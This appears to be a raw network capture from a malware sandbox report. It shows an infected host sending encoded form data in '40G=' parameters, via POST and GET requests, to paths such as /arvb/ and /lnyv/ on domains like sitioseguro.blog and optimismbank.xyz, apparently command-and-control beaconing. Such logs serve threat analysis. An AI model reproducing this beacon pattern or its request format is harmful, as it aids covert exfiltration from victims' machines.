Jan 11, 2025 09:37:11.997503996 CET	1236	IN	HTTP/1.1 405 Not Allowed Date: Sat, 11 Jan 2025 08:37:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ggVxT3nYjRRx7C%2F9eRUyYf%2FKPGEQp738T5iPa%2BKlD6fk1rbalQZtQkkIGFQnpXLxtqXmdhpvLw0aalO1ymB5K7679ZoYDan30wvyZZ9Yw%2BiiRYmjIBqFzub055wtWqn%2Bdfgeyq96eA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003955d3d005e64-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1560&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=825&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disa
Jan 11, 2025 09:37:11.997545958 CET	119	IN	Data Raw: 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: ble MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.7	50014	172.67.162.39	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:15.405340910 CET	845	OUT	POST /arvb/ HTTP/1.1 Host: www.sitioseguro.blog Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.sitioseguro.blog Referer: http://www.sitioseguro.blog/arvb/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 55 44 34 77 70 47 50 4f 65 4f 4b 4c 4f 66 6f 74 47 51 71 61 56 55 54 73 74 61 38 4d 6b 74 57 59 58 65 46 72 31 6f 7a 39 33 6e 56 6d 4a 50 79 78 48 6a 50 63 4d 38 75 6d 74 2f 42 36 37 66 78 76 4a 57 30 67 35 6b 2b 70 6a 79 31 33 73 51 4d 48 51 75 73 52 72 64 45 6f 54 73 71 45 6b 51 59 65 50 6c 75 73 70 78 63 33 32 6e 30 72 46 78 35 45 72 46 62 71 42 73 6c 36 6d 47 77 42 6e 78 57 47 52 62 44 62 68 73 46 6a 63 51 4b 74 34 70 75 44 6e 59 6b 2b 53 49 55 61 66 30 71 61 34 51 35 2b 58 67 56 78 4a 65 65 55 6f 69 47 35 50 76 41 69 32 71 76 4e 63 55 58 73 77 30 55 2b 49 6a 7a 7a 5a 73 4b 2b 78 57 58 39 35 49 54 73 6b 7a 7a 31 4f 34 79 58 56 4a 41 4a 52 79 6c 2f 49 6a 6f 32 43 37 30 36 4e 35 67 3d Data Ascii: 40G=UD4wpGPOeOKLOfotGQqaVUTsta8MktWYXeFr1oz93nVmJPyxHjPcM8umt/B67fxvJW0g5k+pjy13sQMHQusRrdEoTsqEkQYePluspxc32n0rFx5ErFbqBsl6mGwBnxWGRbDbhsFjcQKt4puDnYk+SIUaf0qa4Q5+XgVxJeeUoiG5PvAi2qvNcUXsw0U+IjzzZsK+xWX95ITskzz1O4yXVJAJRyl/Ijo2C706N5g=
Jan 11, 2025 09:37:15.938766003 CET	1236	IN	HTTP/1.1 405 Not Allowed Date: Sat, 11 Jan 2025 08:37:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Eav%2BW%2BuNnhLQ2DO2kDX3Tp%2BOOL7sPqwkloGFKKpewotKuULYKSYUlZEJhgS0LSU3Mfbqe0QxitxAKmDziEdSn3CpYIIQ80lPraaGEZSyLHv2AyE8pjG97hjT%2BpsGu15E32p8agQUA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90039575cd604399-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1594&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=845&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disabl
Jan 11, 2025 09:37:15.938793898 CET	117	IN	Data Raw: 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f Data Ascii: e MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.7	50015	172.67.162.39	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:17.952481031 CET	1858	OUT	POST /arvb/ HTTP/1.1 Host: www.sitioseguro.blog Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.sitioseguro.blog Referer: http://www.sitioseguro.blog/arvb/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 55 44 34 77 70 47 50 4f 65 4f 4b 4c 4f 66 6f 74 47 51 71 61 56 55 54 73 74 61 38 4d 6b 74 57 59 58 65 46 72 31 6f 7a 39 33 6e 4e 6d 49 2b 53 78 47 41 58 63 50 38 75 6d 6e 66 42 33 37 66 77 31 4a 58 63 38 35 6b 69 54 6a 77 4e 33 32 7a 30 48 53 61 34 52 6c 74 45 6f 4d 38 71 46 72 77 59 78 50 68 79 77 70 78 4d 33 32 6e 30 72 46 33 56 45 74 58 7a 71 48 73 6c 35 78 32 77 4e 78 42 57 69 52 66 75 73 68 76 70 5a 63 67 71 74 34 4a 2b 44 30 36 63 2b 65 49 55 63 65 30 72 4a 34 51 31 31 58 68 35 4c 4a 61 57 36 6f 67 57 35 4d 5a 70 39 72 72 48 6b 4b 32 54 61 32 43 55 6b 4e 42 75 47 57 36 32 43 2b 45 4b 54 33 71 4c 74 73 44 44 30 45 50 7a 49 4c 72 6c 2f 49 52 52 51 44 55 49 34 66 37 41 58 4a 39 67 4d 71 62 4d 4f 32 41 50 6d 66 42 67 76 4a 79 59 30 49 55 39 47 69 43 62 78 6b 74 76 52 4e 49 36 54 44 6a 53 33 5a 71 75 77 4b 58 58 62 50 61 68 53 68 77 36 6b 76 78 37 32 43 61 41 55 68 39 54 5a 6c 36 72 78 35 46 6b 50 30 4c 57 70 79 49 6c 63 57 55 71 37 4d 41 52 59 62 63 45 4b 77 38 6e 32 63 71 4b 65 43 4c [TRUNCATED] Data Ascii: 40G=UD4wpGPOeOKLOfotGQqaVUTsta8MktWYXeFr1oz93nNmI+SxGAXcP8umnfB37fw1JXc85kiTjwN32z0HSa4RltEoM8qFrwYxPhywpxM32n0rF3VEtXzqHsl5x2wNxBWiRfushvpZcgqt4J+D06c+eIUce0rJ4Q11Xh5LJaW6ogW5MZp9rrHkK2Ta2CUkNBuGW62C+EKT3qLtsDD0EPzILrl/IRRQDUI4f7AXJ9gMqbMO2APmfBgvJyY0IU9GiCbxktvRNI6TDjS3ZquwKXXbPahShw6kvx72CaAUh9TZl6rx5FkP0LWpyIlcWUq7MARYbcEKw8n2cqKeCL/SnbHrhjqeiLUy+pJPf7Ndw/g1Yl0LDBMJDgeceFMVROtuN8OXtUnrewSlfN7Z7Ha7AK7jCEVDHaOk512QGj2dv4D86OoPpIRxrbvtDcly+64IKjRHFTurlOft75NqygFfdFHojOzZrZDA2w9tuO8zISdLvsnd09ae3Qxi5XJuKyqV0IP+y8T1KhoYgWQCJQBMRwb2JROvwXvWgwSIXEBqfyB1PGuCufIbusJ1G7xvW0z94ZVnqDJlNlVu/8DJMzXygEDpqmEZJHHfU259XOJNCQkaV1DKyuFiw9ndgepEtbUxv216lcwHQOewi3a6sPL1DVUTGa/oC/8lT4PoJ0JdI1DOo1e34iJ+Hxu7OUWJr3OoBZSqWHWaoZnwTvtE7QbjOPhN5c+FDGRyzMdOzVyCdZeZNFIRqsh8x3rCWhISy3ZEpUBiL9w83oSEQ0fGJCVw518g8q7US1IzSCslLAR8DDpQhHPQZ5Jq+jXEefx4SVPP58+ODXwVlDQFijNlR2EWYTKdz+7QcfPrDYhqXXLE6w1emG+tW90aaAozz1N3+s9fI2O2lL+doXyEDKcuAjbu7B90UP9asalq7SzrLYZLpbH/FWgLaG+hkTjCvY8kBKmY6tsyCPs2u4eOKucPbH7PNpflWazRcdPBMQvSYIcGWfPCDg223xHK [TRUNCATED]
Jan 11, 2025 09:37:18.470449924 CET	1236	IN	HTTP/1.1 405 Not Allowed Date: Sat, 11 Jan 2025 08:37:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWcAW49sGEYAN1YEmEXIJNlqMsRerPH%2BXMHemFu15HPp2rNV8DhLYZAMAuGnJcIz8yDFcptQzFLWj2ybZaJtT2GYHsU4XPQB1EGPmp8uEHt2kzMZTCSeTVqoTBGY2oCN1FvmNbWyTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90039585ad356a50-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1695&rtt_var=847&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1858&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSI
Jan 11, 2025 09:37:18.470493078 CET	107	IN	Data Raw: 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 Data Ascii: E and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 11, 2025 09:37:18.471451044 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.7	50016	172.67.162.39	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:20.496623039 CET	548	OUT	GET /arvb/?40G=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//ud7VMWFkg8aHFm5yBkuyjZoE2tjqm34JPZ+m3kLgGiOEtHU69tbM0ur&I6=x8CX HTTP/1.1 Host: www.sitioseguro.blog Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:37:21.017569065 CET	841	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 08:37:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90S2Vag9pNfDcSkEav%2FlhUfc6AXgEPDq9BsERJuZLx9XlbPToKptH92Fbg43%2Fka10AMYT0KnGQtsIai%2FReVrvo4PJrgETYcGFLuvlJ2BAarqfDyrOGUVJiQU5ue94zTab%2FxpL0IJig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900395959cb2c334-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1473&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=548&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 09:37:21.017636061 CET	1236	IN	Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robo
Jan 11, 2025 09:37:21.017669916 CET	224	IN	Data Raw: 63 68 61 69 6e 69 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 Data Ascii: chaining:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items
Jan 11, 2025 09:37:21.017788887 CET	1236	IN	Data Raw: 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 76 77 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 7d 2e 77 69 6e 64 Data Ascii: :center;justify-content:center;min-height:100vh;min-width:100vw;padding:1rem}.window-main{background-color:#13151a;border-radius:.75rem;max-width:45.625rem}.window-main .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main
Jan 11, 2025 09:37:21.017833948 CET	1236	IN	Data Raw: 61 69 6e 7b 70 61 64 64 69 6e 67 3a 33 2e 37 35 72 65 6d 20 38 2e 39 33 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f Data Ascii: ain{padding:3.75rem 8.9375rem}.window-main__title{font-size:2.25rem}.window-main__body{font-size:1.0625rem}.window-main__info{margin-bottom:1.875rem}.window-main__list{padding-left:.6875rem}.window-main__item{padding-left:.875rem}}@media (max-
Jan 11, 2025 09:37:21.017864943 CET	1236	IN	Data Raw: 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38 2e 39 33 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 Data Ascii: t:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-right:calc(1.5rem + 7.4375*(100vw - 20rem)/ 25.625)}}@supports (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top
Jan 11, 2025 09:37:21.017945051 CET	672	IN	Data Raw: 2e 37 32 38 36 35 38 35 33 36 36 72 65 6d 20 2b 20 2e 37 33 31 37 30 37 33 31 37 31 76 77 20 2c 31 2e 30 36 32 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 30 2e 38 37 35 72 65 Data Ascii: .7286585366rem + .7317073171vw ,1.0625rem)}}@supports not (font-size:clamp(0.875rem ,0.7286585366rem + 0.7317073171vw ,1.0625rem)){.window-main__body{font-size:calc(.875rem + .1875*(100vw - 20rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5re
Jan 11, 2025 09:37:21.017973900 CET	1236	IN	Data Raw: 28 2e 35 36 32 35 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 Data Ascii: (.5625rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-le
Jan 11, 2025 09:37:21.018003941 CET	1236	IN	Data Raw: 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c Data Ascii: "none" xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363
Jan 11, 2025 09:37:21.018033981 CET	1236	IN	Data Raw: 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 32 34 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 Data Ascii: anBlur stdDeviation="124" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
Jan 11, 2025 09:37:21.022711992 CET	1236	IN	Data Raw: 6d 61 69 6e 20 69 73 20 70 6f 69 6e 74 65 64 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 2c 20 62 75 74 20 74 68 65 72 65 20 69 73 20 6e 6f 20 73 69 74 65 20 77 69 74 68 20 74 68 61 74 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 74 68 65 20 73 Data Ascii: main is pointed to the server, but there is no site with that domain name on the server.</li><li class="window-main__item">You are accessing the site via HTTPS, but the site does not have an SSL certificate installed.</li><li c

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.7	50017	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:26.081835032 CET	825	OUT	POST /lnyv/ HTTP/1.1 Host: www.optimismbank.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.optimismbank.xyz Referer: http://www.optimismbank.xyz/lnyv/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 45 43 4f 6f 6c 34 5a 5a 34 69 47 54 66 57 66 30 49 76 5a 42 7a 39 34 36 32 31 35 46 63 59 4b 45 66 74 54 74 59 56 2b 39 53 6f 64 2b 6d 51 6d 4e 4b 32 4f 56 6a 34 74 7a 7a 56 69 6e 55 4e 43 65 45 4b 68 78 41 32 6d 58 62 74 4d 64 50 76 70 42 50 32 54 33 71 57 38 7a 52 68 69 4e 57 4b 57 46 51 64 45 68 69 30 7a 45 33 67 62 42 4b 7a 48 67 67 6c 35 48 4a 6b 64 5a 6b 6a 50 56 2f 41 62 54 57 41 64 76 63 64 37 77 76 4d 4b 51 63 6d 6a 4a 6b 35 71 72 30 66 78 67 6b 39 54 4a 70 56 4f 36 6b 56 6d 6e 30 4d 75 6a 50 6e 7a 52 51 6f 58 30 69 32 41 34 33 79 67 74 44 65 70 74 4f 7a 6b 4d 42 2f 41 71 65 4a 39 2f 42 77 31 4a 30 76 6d 36 35 77 3d 3d Data Ascii: 40G=ECOol4ZZ4iGTfWf0IvZBz946215FcYKEftTtYV+9Sod+mQmNK2OVj4tzzVinUNCeEKhxA2mXbtMdPvpBP2T3qW8zRhiNWKWFQdEhi0zE3gbBKzHggl5HJkdZkjPV/AbTWAdvcd7wvMKQcmjJk5qr0fxgk9TJpVO6kVmn0MujPnzRQoX0i2A43ygtDeptOzkMB/AqeJ9/Bw1J0vm65w==

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.7	50018	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:37:28.624495983 CET	845	OUT	POST /lnyv/ HTTP/1.1 Host: www.optimismbank.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.optimismbank.xyz Referer: http://www.optimismbank.xyz/lnyv/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 45 43 4f 6f 6c 34 5a 5a 34 69 47 54 66 32 76 30 62 63 42 42 31 64 34 35 35 56 35 46 48 6f 4b 41 66 74 66 74 59 51 48 69 54 